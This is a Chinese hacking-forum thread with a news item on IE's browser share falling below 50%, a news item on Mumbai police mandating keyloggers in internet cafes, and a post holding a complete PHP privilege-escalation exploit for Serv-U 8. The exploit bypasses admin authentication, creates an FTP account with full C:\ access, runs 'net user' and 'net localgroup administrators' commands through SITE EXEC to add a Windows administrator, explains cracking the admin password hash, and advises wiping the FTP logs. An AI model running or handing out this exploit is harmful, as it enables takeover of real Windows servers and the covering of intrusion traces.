最近看过此主题的会员

返回列表 发帖

IE浏览器全球市场占有率跌至50%以下

图为StatCounter统计的浏览器市场份额

  新浪科技讯 北京时间10月6日早间消息,据国外媒体报道,数据调查机构StatCounter的报告显示,9月份微软IE的全球市场占有率首次跌至50%以下,为49.87%,比2009年9月下降8.5%。
  或许更让微软担忧的是,报告还显示,IE的使用时间比2008年9月下降了17%。
  尽管目前微软的各版本IE依然占据浏览器市场的最大份额,Firefox也取得了31.5%的好成绩。而谷歌Chrome则是进步最快的浏览器,从2008年9月仅1%的市场份额上升至2010年9月的近12%。接下来是苹果Safari的4.42%和Opera的2.03%。
  在英国,IE的占有率比全球范围内的数字更高,为54.63%,Firefox的市场份额为24.68%。
  目前,IE9、Firefox 4和Chrome 7均在测试版阶段,浏览器大战的好戏还在后头。(张和)

 

您可能还想看的主题:

Android系统再现木马,变身驱动程式袭击用户

谷歌南门立木:奖励攻破Chrome黑客百万美元

最新网站注入方法

全新的注入点检测方法

中国“天河一号”成为全球最快超级计算机

李彦宏入围福布斯2010全球最具影响力人物榜

网易全球名校视频公开课项目上线

最新国际超级无敌绝对大新闻!!!!! (震惊全球)!!!

IE8获最佳安全浏览器称号

PHP:路在何方?

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:小一发表,本帖发表者小一符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者小一和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

我想要申请做站长论坛的斑主:www.sitedirsec.com 。。。。。。。。。


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

孟买网吧电脑安装键盘记录器
据国外媒体报道,为更好地打击恐怖分子,印度孟买政府日前下令,全孟买城的网吧电脑都必须安装警方核准的键盘记录器软件。
[/quote]
[quote]  在孟买共有常住人口1300万,但只有网吧业主被要求在网吧电脑上安装键盘记录软件。所有的网吧业主需要在警察局登记备案,提交网吧电脑的数量和所有电脑的IP地址,最后领取一张城市执照。任何没有注册的网吧业主将被罚款,或者遭受更加严厉的惩罚。
  据报道,孟买政府之所以做出这项决定,是因为早先在孟买和海德拉巴市发生的恐怖爆炸袭击都是在网吧中组织的。
  “警方需要在网吧电脑中安装程序,捕获任何键盘输入,并将这些数据发送到一台记录数据的服务器,”印度信息安全和技术基金会主席维亚加·莫可黑说。“随后警方可以对恐怖分子之间的所有通信进行跟踪。这是警方巡逻网络的唯一方式,也是警方顺利e时代发展的潮流。”
  全世界的隐私专家和博客们指出,尽管如此,犯罪分子仍然有许多方式可以使匿名通信。一名CNET博客表示,使用代理服务器和Tor可以很便利地绕过键盘记录器


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Serv-u8提权漏洞及方法
测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?/*serv-u 8 local exp ver 1.0如果你在自己的服务器上发现这个文件,厄。。。那太遗憾了,别来找我。这个文件到处都是,人人都能拿到。*/
?><html><title>Serv-u 8 local exp ver 1.0</title><body><script>function fun_showDiv(show){document.getElementById(show).style.display="block";}</script><b>Serv-u 8 local exp ver 1.0</b><form id="form1" name="form1" method="post" action="?"><p><a href="#" onclick="fun_showDiv('adminpassdiv')">管理员密码</a><input type="text" name="admin_pwd" value="" /></p><p>直接提权!<input type="submit" name="cmd" value="提权" /><a href="#" onclick="fun_showDiv('QAdiv')">QA</a></p><pre>
<?
//Global var$port=43958;$host="127.0.0.1";$sessionid="";$getuserid="";$ftpport=21;$ftpuser="lalala_hacked";$ftppwd=$_POST['admin_pwd'];$exec_addUser="site exec c:/windows/system32/net.exe user ".$ftpuser." ".$ftppwd." /add";$exec_addGroup="site exec c:/windows/system32/net.exe localgroup administrators ".$ftpuser."  /add";
if($_POST['cmd']) {
//login-----------------------------------------$sock_login = fsockopen($host, $port);$URL='/Web%20Client/Login.xml?Command=Login&amp;Sync=1543543543543543';$post_data_login['user'] = "";$post_data_login['pword'] = $ftppwd;$post_data_login['language'] = "zh%2CCN&amp;";$ref="http://".$host.":".$port."/?Session=39893&amp;Language=zh,CN&amp;LocalAdmin=1";$postStr = createRequest($port,$host,$URL,$post_data_login,$sessionid,$ref);fputs($sock_login, $postStr);$result = fread($sock_login, 1280);$sessionid = getmidstr("<sessionid>","</sessionid>",$result);if ($sessionid!="")echo "登陆成功!";fclose($sock_login);//login-----------------------------------------
//getOrganizationId-------------------------------$OrganizationId="";$sock_OrganizationId = fsockopen($host, $port);$URL='/Admin/ServerUsers.htm?Page=1';$postStr = createRequest($port,$host,$URL,"",$sessionid,"");fputs($sock_OrganizationId, $postStr);$resultOrganizationId="";while(!feof($sock_OrganizationId)) {$result = fread($sock_OrganizationId, 1024);$resultOrganizationId=$resultOrganizationId.$result;}$strTmp = "OrganizationUsers.xml&amp;ID=";$OrganizationId = substr($resultOrganizationId,strpos($resultOrganizationId,$strTmp)+strlen($strTmp),strlen($strTmp)+15);$OrganizationId = substr($OrganizationId,0,strpos($OrganizationId,"""));fclose($sock_OrganizationId);if ($OrganizationId!="")echo "获取OrganizationId".$OrganizationId."成功!";//getOrganizationId-------------------------------
//getuserid---------------------------------------$getuserid="";$sock_getuserid = fsockopen($host, $port);$URL="/Admin/XML/User.xml?Command=AddObject&amp;Object=COrganization.".$OrganizationId.".User&amp;Temp=1&amp;Sync=546666666666666663";$ref="http://".$host.":".$port."/Admin/ServerUsers.htm?Page=1";$post_data_getuserid="";$postStr = createRequest($port,$host,$URL,$post_data_getuserid,$sessionid,$ref);fputs($sock_getuserid, $postStr);$result = fread($sock_getuserid, 1280);$result = getmidstr("<var name="ObjectID" val="","" />",$result);fclose($sock_getuserid);$getuserid = $result;if ($getuserid!="")echo "获取用户ID".$getuserid."成功!";//getuserid---------------------------------------
//addpower-----------------------------------------$sock_addpower = fsockopen($host, $port);$URL="/Admin/XML/Result.xml?Command=AddObject&amp;Object=CUser.".$getuserid.".DirAccess&amp;Sync=1227081437828";$post_data_addpower['Access'] = "7999";$post_data_addpower['MaxSize'] = "0";$post_data_addpower['Dir'] = "c:\";$post_data_addpower['undefined'] = "undefined";$postStr = createRequest($port,$host,$URL,$post_data_addpower,$sessionid,"http://127.0.0.1".":".$port."/Admin/ServerUsers.htm?Page=1");fputs($sock_addpower, $postStr,strlen($postStr));$result = fread($sock_addpower, 1280);fclose($sock_addpower);
echo "添加权限成功!";
//addpower-----------------------------------------
//adduser-----------------------------------------$sock_adduser = fsockopen($host, $port);$URL="/Admin/XML/Result.xml?Command=UpdateObject&amp;Object=COrganization.".$OrganizationId.".User.".$getuserid."&amp;Sync=1227071190250";$post_data_adduser['LoginID'] = $ftpuser;$post_data_adduser['FullName'] = "";$post_data_adduser['Password'] = 'hahaha';$post_data_adduser['ComboPasswordType'] = "%E5%B8%B8%E8%A7%84%E5%AF%86%E7%A0%81";$post_data_adduser['PasswordType'] = "0";$post_data_adduser['ComboAdminType'] = "%E6%97%A0%E6%9D%83%E9%99%90";$post_data_adduser['AdminType'] = "";$post_data_adduser['ComboHomeDir'] = "/c:";$post_data_adduser['HomeDir'] = "/c:";$post_data_adduser['ComboType'] = "%E6%B0%B8%E4%B9%85%E5%B8%90%E6%88%B7";$post_data_adduser['Type'] = "0";$post_data_adduser['ExpiresOn'] = "0";$post_data_adduser['ComboWebClientStartupMode'] = "%E6%8F%90%E7%A4%BA%E7%94%A8%E6%88%B7%E4%BD%BF%E7%94%A8%E4%BD%95%E7%A7%8D%E5%AE%A2%E6%88%B7%E7%AB%AF";$post_data_adduser['WebClientStartupMode'] = "";$post_data_adduser['LockInHomeDir'] = "0";$post_data_adduser['Enabled'] = "1";$post_data_adduser['AlwaysAllowLogin'] = "1";$post_data_adduser['Description'] = "";$post_data_adduser['IncludeRespCodesInMsgFiles'] = "";$post_data_adduser['ComboSignOnMessageFilePath'] = "";$post_data_adduser['SignOnMessageFilePath'] = "";$post_data_adduser['SignOnMessage'] = "";$post_data_adduser['SignOnMessageText'] = "";$post_data_adduser['ComboLimitType'] = "%E8%BF%9E%E6%8E%A5";$post_data_adduser['LimitType'] = "Connection";$post_data_adduser['QuotaBytes'] = "0";$post_data_adduser['Quota'] = "0";$post_data_adduser['Access'] = "7999";$post_data_adduser['MaxSize'] = "0";$post_data_adduser['Dir'] = "%25HOME%25";$postStr = createRequest($port,$host,$URL,$post_data_adduser,$sessionid,"http://127.0.0.1".":".$port."/Admin/ServerUsers.htm?Page=1");fputs($sock_adduser, $postStr,strlen($postStr));$result = fread($sock_adduser, 1280);fclose($sock_adduser);
echo "添加用户成功!";//adduser-----------------------------------------
//exec-------------------------------$sock_exec = fsockopen("127.0.0.1", $ftpport, &amp;$errno, &amp;$errstr, 10);$recvbuf = fgets($sock_exec, 1024);$sendbuf = "USER ".$ftpuser."";fputs($sock_exec, $sendbuf, strlen($sendbuf));$recvbuf = fgets($sock_exec, 1024);
$sendbuf = "PASS hahaha";fputs($sock_exec, $sendbuf, strlen($sendbuf));$recvbuf = fgets($sock_exec, 1024);
$sendbuf = $exec_addUser."";fputs($sock_exec, $sendbuf, strlen($sendbuf));$recvbuf = fread($sock_exec, 1024);echo "执行".$exec_addUser."返回了$recvbuf";fclose($sock_exec);
$sock_exec = fsockopen("127.0.0.1", $ftpport, &amp;$errno, &amp;$errstr, 10);$recvbuf = fgets($sock_exec, 1024);$sendbuf = "USER ".$ftpuser."";fputs($sock_exec, $sendbuf, strlen($sendbuf));$recvbuf = fgets($sock_exec, 1024);
$sendbuf = "PASS hahaha";fputs($sock_exec, $sendbuf, strlen($sendbuf));$recvbuf = fgets($sock_exec, 1024);
$sendbuf = $exec_addGroup."";fputs($sock_exec, $sendbuf, strlen($sendbuf));$recvbuf = fread($sock_exec, 1024);
echo "执行".$exec_addGroup."返回了$recvbuf";fclose($sock_exec);echo "好了,自己3389上去清理ftp用户日志吧!";//exec-------------------------------
}
/** function createRequest@port_post : administrator port $port=43958;@host_post : host $host="127.0.0.1";@URL_post : target $URL='/Web%20Client/Login.xml?Command=Login&amp;Sync=1543543543543543';@post_data_post : arraylist $post_data['user'] = "";...@return httprequest string*/function createRequest($port_post,$host_post,$URL_post,$post_data_post,$sessionid,$referer){$data_string="";if ($post_data_post!=""){foreach($post_data_post as $key=>$value){$values[]="$key=".urlencode($value);}$data_string=implode("",$values);}$request.="POST ".$URL_post." HTTP/1.1";$request.="Host: ".$host_post."";$request.="Referer: ".$referer."";$request.="Content-type: application/x-www-form-urlencoded";$request.="Content-length: ".strlen($data_string)."";$request.="User-Agent: Serv-U";$request.="x-user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)";$request.="Accept: */*";$request.="Cache-Contro: no-cache";$request.="UA-CPU: x86";
if ($sessionid!=""){$request.="Cookie: Session=".$sessionid."";}$request.="";$request.=$data_string."";
return $request;}
//getMidfor2str copy from internetfunction getmidstr($L,$R,$str){$int_l=strpos($str,$L);$int_r=strpos($str,$R);If ($int_l>-1&amp;&amp;$int_l>-1){$str_put=substr($str,$int_l+strlen($L),($int_r-$int_l-strlen($L)));return $str_put;}elsereturn "没找到需要的变量";}?></pre></form><div id="adminpassdiv" style="display:none"><pre>默认为空,如果密码为空,<b>填什么都能进去。</b>如果修改过,管理员密码默认会在这里:<b>C:Program FilesRhinoSoft.comServ-UUsersLocal Administrator Domain.Archive</b>文件中找到一个MD5密码值。C:Program FilesRhinoSoft.comServ-U是su的根目录。密码值的样式为(假设是123456)kx########################代表123456的32位MD5加密,而kx则是su对md5的密码算法改进的随机2位字符。破解后的密码为<b>kx</b>123456,去掉kx就是密码了。你可以针对这个加密生成字典。
</pre></div><div id="QAdiv" style="display:none"><pre><b>提权的原理?</b>Su8的管理平台是http的,继承了su7的方式。抓包,分析,发现了以下路程是可以利用的。1,  管理员从管理控制台打开web页面时,是不需要验证密码的。2,  管理员如果用某URL打开web页面时,虽然需要输入密码,但是无论输入什么,都可以进入。“/?Session=39893&amp;Language=zh,CN&amp;LocalAdmin=1”3,  管理员可以添加用户有两种,一种是全局用户,一种是某个域下的用户。而权限设置也是两种,一种是全局,一种是针对用户。4,  管理员添加了用户的这个包和设置权限这个包,是分开的。所以,我可以抓包然后转换成php的socket连接post出去。最后在用经典的ftp登陆,exec命令。达到提权。


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表